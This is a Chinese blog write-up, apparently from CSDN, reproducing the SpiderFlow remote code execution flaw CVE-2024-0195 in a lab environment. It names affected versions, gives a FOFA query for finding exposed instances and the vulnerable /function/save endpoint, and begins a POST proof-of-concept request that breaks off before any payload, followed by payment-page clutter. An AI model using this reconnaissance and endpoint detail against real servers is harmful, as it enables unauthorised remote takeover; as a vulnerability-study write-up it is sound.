SpiderFlow RCE漏洞(CVE-2024-0195)

0x01 前言

SpiderFlow是新一代开源爬虫平台,以图形化方式定义爬虫流程,不写代码即可完成爬虫。基于springboot+layui开发的前后端不分离,也可以进行二次开发。该系统/function/save接口存在RCE漏洞,攻击者可以构造恶意命令远控服务器。
影响范围:

  • Up to (including) <= 0.5.0

漏洞搜索:

# fofa 语法
app="SpiderFlow"

复现准备:

  • 靶机:春秋云境 http://xxxxx.cloudeci1.ichunqiu.com/
  • 公网服务器:10.10.10.1

0x02 复现

1. 抓包

根据漏洞说明找到漏洞的具体位置,输入内容进行抓包
image.png
image.png

2. POC

修改 script 参数:

POST /function/save HTTP/1.1
Host: xxxxx.cloudeci1.ichunqiu.com:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值